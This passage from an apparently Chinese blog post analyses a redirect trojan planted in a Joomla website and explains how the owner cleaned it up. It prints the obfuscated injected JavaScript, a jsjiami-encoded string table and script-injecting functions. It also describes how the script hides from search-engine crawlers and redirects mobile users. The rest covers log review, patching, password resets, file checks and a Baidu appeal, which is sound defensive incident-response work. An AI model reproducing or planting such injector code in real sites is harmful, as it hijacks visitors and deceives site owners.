return ['kse6cCojeG', 'y8oPWRdcHcldKbNdOq', 'kCo2kmk7mwXfWRn4wa', 'W4H3W4euW6RcOmktWPmVWRldOCoGWO8'].concat((function() {
return ['W6BdVmoSFJ7cP8oqWQLMyfRdJgfBdmkTzCklWORdSW', 'huC6WQVcKmoQW7NcKCoEW5raW6ZdRq', 'odRcMCoGuw3dRKi', 'W43cISog'].concat((function() {
return ['W4ZcJtNcR8kLzJ9pWQjvpSo9W7uJWRWEnCoYW6P3W6/cHSoCzmoceK3dHYNcLKJcMCkCi8oiWO/dHmo7zSkRFGD1vhpdMSonWPffECkyWRHbDCkSWRadWPpcNa', 'jdNcM8o1q2VdS0e', 'nfFcLtubW4WuESk0BSknACk6W4uQWObzW6G8W5q', 'WPFcKmoxW5jlWOGvqSklW7ddJmoK'].concat((function() {
return ['WO3cNCowW55jWOG', 'WQNcL8ok', 'WPWZW6pdMCkHwmoLW4PUcmkCbH4CgdhdQLZcTmoRW7zRyc9LW4PAocCKW6NdVCk+dCouzmotBCk4qmonf2VdO8oO', 'AtpcP8kvWQbe'].concat((function() {
return ['W7JcSCkWW7mHDW', 'WPddJ8ksamoQBmoadCkA', 'lx7dMmoljv9t', 'W43dH8kwWOijW4OBqmk8W5pdUCoh'].concat((function() {
return ['WPZcL8o0', 'W6/cLmk2W6P9W7lcUCkF', 'W5hdI8odsSoErbVcNxC', 'WRT7WRhcTrjJ'].concat((function() {
return ['lZeTeSo4aCoavWS'];
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}());
// Memoise: later calls return the array built above without re-running the IIFEs.
_0x3def = function() {
return _0x27feef;
};
return _0x3def();
};
// Two more injector IIFEs in the same shape as the ones above: create an element from a decoded
// tag name, set one decoded property (presumably a script src), insert it before the first element
// of a decoded tag name (presumably parentNode.insertBefore). Decoded values are not visible here.
(function() {
var _0x48b51c = _0x192e24,
_0x33285c = {
'NEQfK': _0x48b51c(0x185, 'RXJk'),
'Opxhu': _0x48b51c(0x1b6, '9H3o')
},
_0x1363b1 = document[_0x48b51c(0x1cf, '3HAi')](_0x33285c[_0x48b51c(0x1ba, '$ezs')]);
_0x1363b1[_0x48b51c(0x1a2, '@V$o')] = _0x33285c[_0x48b51c(0x1c7, '*j0B')];
var _0x1bb213 = document[_0x48b51c(0x1c9, '1wHD')](_0x33285c[_0x48b51c(0x1b2, 'ngSg')])[0x0];
_0x1bb213[_0x48b51c(0x1b5, '%E85')][_0x48b51c(0x1e3, 'RXJk')](_0x1363b1, _0x1bb213);
}());
// Baidu Tongji boilerplate again (see above).
var _hmt = _hmt || [];
(function() {
var _0x5bcdc9 = _0x192e24,
_0x244b8b = {
'zXsXC': _0x5bcdc9(0x1b9, 'ggYp'),
'dtJnA': _0x5bcdc9(0x1d2, '9H3o')
},
_0x3a8e3e = document[_0x5bcdc9(0x1cd, 'r[pl')](_0x244b8b[_0x5bcdc9(0x19e, 'Yk2o')]);
_0x3a8e3e[_0x5bcdc9(0x19b, '&Xuf')] = _0x244b8b[_0x5bcdc9(0x1d3, '(vl9')];
var _0xe05786 = document[_0x5bcdc9(0x196, '@V$o')](_0x244b8b[_0x5bcdc9(0x1b1, '[ovU')])[0x0];
_0xe05786[_0x5bcdc9(0x1d4, 'ek[h')][_0x5bcdc9(0x194, '%E85')](_0x3a8e3e, _0xe05786);
}()); < /script>
这段代码做得很一般:整个页面就是一段 js,先排除搜索引擎爬虫的 UA(避免被搜索引擎发现跳转),只对真实的移动端用户生效;然后依据浏览器类型,要么直接跳转到随机选出的 url,要么创建 iframe 把它嵌进页面里。也就是我们在访问某些不良网站时经常遇到的不断跳转的现象。这里的 js 代码看起来非常复杂,实际上只是用第三方工具(jsjiami.com v7)做了混淆而已:所有字符串用 base64 + RC4 加密后存在一张表里,运行时按索引解出来。写这段代码的人水平就一般。
通过分析木马代码和对应木马的服务端代码,整个木马构成非常简单,没有什么技术含量。我尝试去网信部门举报这两个为木马服务的域名,只要能够将这两个域名封禁,那么所有中了此木马的网站就都可以解决问题了。但举报需要实名认证,填写身份证号码,搞得非常麻烦,最终也就没有去做。在此提一点意见,如果能够让举报违法简单化,那么整个网络环境会好很多。(另外也可以向这两个域名的注册商和托管服务商提交 abuse 投诉,流程一般比较简单。)
尝试的解决方法
网站之所以会被挂木马,说明我们的服务器是有漏洞的。对于普通用户或者程序员来说,精确追踪是哪一个漏洞导致了这次入侵挂马难度很大。不过至少可以做几件事来缩小范围:以木马文件的修改时间为线索,翻看这个时间点前后 web 服务器的访问日志(重点看对后台 administrator/、上传接口和第三方扩展的 POST 请求),以及 FTP/SSH 的登录记录;同时检查后台是否多出了陌生的管理员账号。
在此次事件中,我们把之前用的 CentOS 7(已停止维护)服务器更换为阿里云最新的操作系统,解决操作系统层面的漏洞;另外,将网站程序 Joomla 升级到当前版本的最新版本,解决程序代码的问题;同时将 FTP 密码、服务器密码均进行了重置。需要强调的是,重装系统和升级程序并不能保证清理干净:还应当用官方发行包比对全部核心文件,逐一检查 templates、plugins、modules、images、tmp、cache 等目录里是否有不该存在的 PHP 文件,检查 .htaccess、后台管理员账号、数据库里的文章内容以及系统 crontab 是否被动过;并同时重置数据库密码和 configuration.php 里的 secret,把明文 FTP 换成 SFTP,给后台开启两步验证。这样才算初步解决了这个问题。
关于网站被K的问题
当木马被完全清理之后,要第一时间去百度搜索资源平台申诉,申请解封。申诉之前先用百度的抓取诊断工具再抓一次,确认爬虫看到的内容已经和浏览器里一致。大概两周就能解封。
